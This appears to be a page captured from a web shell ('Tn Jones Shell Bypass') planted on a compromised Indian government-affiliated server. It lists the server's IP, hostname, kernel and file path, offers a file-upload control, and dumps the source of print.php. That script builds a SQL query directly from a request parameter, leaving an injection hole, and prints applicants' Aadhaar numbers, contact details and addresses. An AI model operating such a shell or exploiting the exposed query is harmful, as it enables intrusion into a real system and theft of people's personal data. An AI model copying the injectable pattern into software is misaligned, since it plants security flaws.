Tn Jones Shell Bypass
:
3.145.112.163
:
160.187.54.56 / upgov.net
:
Linux 160-187-54-56.cprapid.com 4.18.0-553.22.1.lve.1.el7h.x86_64 #1 SMP Tue Oct 8 14:36:03 UTC 2024 x86_64
:
/
home
/
upgov
/
www
/
rpl
/
report
/
Upload File:
files >> /home/upgov/www/rpl/report/print.php
<?php date_default_timezone_set("Asia/Kolkata"); ?> <?php include("connection.php"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title> Candidate Print Form </title> <link href="./ReportPrint.css" rel="stylesheet"/> <style type="text/css"> .PrintTable { margin: 2 auto; width: 54%; color: #000; font-size: 15px; } .PrintTable td { border: 1px solid; height:35px; } .PrintTable table { color: #000 !important; } .PrintTable table td { border: none; } .tableColumnBorder { color: #000 !important; } .tableColumnBorder td { border: 1px solid !important; } .spanHead { width:25%; font-size: 18px; font-weight: bold; text-align:center; } .style1 { margin: 2 auto; color: #0000A0; font-family: Verdana, Arial, Helvetica, sans-serif; } .style2 {font-family: Verdana, Arial, Helvetica, sans-serif} .style3 {color: #FF0000} </style> <script type="text/javascript"> function printdiv() { //your print div data //alert(document.getElementById("printpage").innerHTML); var newstr=document.getElementById("printpage").innerHTML; var header='<header><div align="center"><h3 style="color:#EB5005">Print</h3></div><br></header><hr><br>' var footer =""; //You can set height width over here var popupWin = window.open('', '_blank', 'width=1100,height=600'); popupWin.document.open(); popupWin.document.write('<html> <body onload="window.print()">'+ newstr + '</html>' + footer); popupWin.document.close(); return false; } </script> </head> <body> <form method="post" action="#" id="form1"> <div class="divhead"> <a href='#' onclick='printdiv()' > <img src='images/Printer.png' title='printer' height='20' align='right' style='margin-right:20px;text-align:right;'> </a> <a href='http://rpl.upgov.net/report/tables2.php'> <b>BACK</b> </a> </div> <?php $regid=$_REQUEST['id']; $sql=mysql_query("select * from Uppcl_Rpl where Registration_no='$regid'"); if(mysql_num_rows($sql)>0) { $r=mysql_fetch_array($sql); ?> <div id='printpage'> <center> <div> <div class="statustracker"> <div style="float: center;"> <div class="logohead ucSecuredHeader" id="divSecuredheader"> <img src="images/Skill_India.png" style="border-radius: 0px; height: 70px;"> <a target="_blank" href="#"><img style="border-radius: 0px; height: 70px; background: #152f49 none repeat scroll 0 0;" src="images/power sector.jpg"></a> <img style="border-radius: 0px; height: 70px; background: #152f49 none repeat scroll 0 0;" src="images/nsdc.png"></a> </div> </div> </div> <div class="clearfix"></div> </div> <div> <h2>UPPCL-RPL Skilling Initiative</h2> </div> <table class="PrintTable" border='1' cellspacing='2' cellpadding='3' width='800px;'> <tbody> <tr><td colspan='7' align='center'><b> Candidate Application-Print Form</b> <span> <span id="lblPIAAddress"><b></b></span> </span></td></tr> <tr> <td class="spanHead" >Registration No</td> <td colspan="5"><span class="spanChild style2" id="lblCentreState"><?php echo $r['Created_date '];?> (<?php echo $r['Registration_no'];?>)</span></td> </tr> <tr> <td class="spanHead" >Training Period (प्रशिक्षण अविधि) : </td> <td colspan="5"><span class="spanChild style2" id="lblCentreName"><b>From -</b><?php echo $r['Training_Period_From'];?> <b>To -</b><?php echo $r['Training_Period_To'];?></span></td> </tr> <tr> </tr> <tr> <td class="spanHead">Candidate Name (अभ्यर्थी का पूरा नाम) : </td> <td ><span class="spanChild style2" id="lblCentreName"><?php echo $r['Candidate_Name'];?> <?php echo $r['Candidate_middle_name'];?> <?php echo $r['Candidate_last_name'];?></span></td> <td class="spanHead" rowspan="3"><img src="#" alt="photo" style="border-radius: 0px; height: 150px;"> </td> </tr> <tr> <td class="spanHead">Father Name (पिता का नाम) : </td> <td><span class="spanChild style2" id="lblCentreName"><?php echo $r['Father_Name'];?></span></td> </tr> <tr> <td class="spanHead" >Date of birth</td> <td><span class="spanChild style2" id="lblDistrict"><?php echo $r['Dob'];?></span></td> </tr> <tr> <td class="spanHead" >Email (ईमेल) : </td> <td colspan="5"><span class="style2"><?php echo $r['Email_Address'];?></span></td> </tr> <tr> <td class="spanHead" width="114" >Contact No. (संपर्क नंबर) :</td> <td colspan="5"> <span class="spanChild style2" id="lblMothersName"><?php echo $r['Contact_No'];?> </span> </td> </tr> <tr> <td class="spanHead" width="114" >Contact No.2 (संपर्क नंबर) : </td> <td colspan="5"> <span class="spanChild style2" id="lblMothersName"><?php echo $r['Contact_No2'];?> </span> </td> </tr> <tr> <td class="spanHead">Aadharcard_no (आधारकार्ड न०) :</td> <td colspan="5"><span class="spanChild style2" id="lblFathersName"><?php echo $r['Aadharcard_no'];?> </span></td> </tr> <tr> <td class="spanHead">Permanent Address (पता) : </td> <td colspan="5"><span class="spanChild style2" id="lblFathersName"><?php echo $r['Address'];?> </span></td> </tr> <tr> <td class="spanHead">Occupation (व्यवसाय) : </td> <td class="FrmTbl" colspan="5"><span class="spanChild style2" id="lblCategory"><?php echo $r['Occupation'];?></span></td> </tr> <tr> <td class="spanHead">Working Experience (yrs)/ कार्य अनुभव (वर्षो में) : </td> <td class="FrmTbl" colspan="5"><span class="spanChild style2" id="lblCategory"><?php echo $r['Work_Exp'];?></span></td> </tr> <tr> <td class="spanHead">Job Role Applied (प्रशिक्षण विषय के लिए) : </td> <td class="FrmTbl"colspan="5" ><span class="spanChild style2" id="lblCategory"><?php echo $r['Trade'];?></span></td> </tr> <tr> <td colspan='7'><font size="+1"><b> DECLARATION / घोषणा </b></font></td> </tr> <tr> <td class="FrmTbl" colspan='7'>I do hereby Declare that the above information is true to the best of my knowledge.In case any error is found at a later date,I shall be liable for the consequences arising form there</td> </tr> <tr> <td class="FrmTbl" colspan='7'>मैं यह घोषणा करता हूँ कि उपरोक्त जानकारी मेरे ज्ञान का सबसे अच्छा है | अगर क़िसी त्रुटि को बाद की तारीख में पाया जाता है ,तो मैं इन परिणामों के लिए उत्तरदायी होगा</td> </tr> <tr> <td class="spanHead" >Place (स्थान )</td> <td class="FrmTbl" colspan="5"></td> </tr> <tr> <td class="spanHead" >Date (तारीख)</td> <td class="FrmTbl" colspan="5"><span id="lblDate"><?php echo $r['Tot_exp'];?></span></td> </tr> <tr> <td class="spanHead" >Signature (हस्ताक्षर)</td> <td class="FrmTbl" colspan="5"><span id="lblDate"><?php echo $r['Tot_exp'];?></span></td> </tr> </tbody> </table> </center> </div> </form> <?php } ?> </body> </html>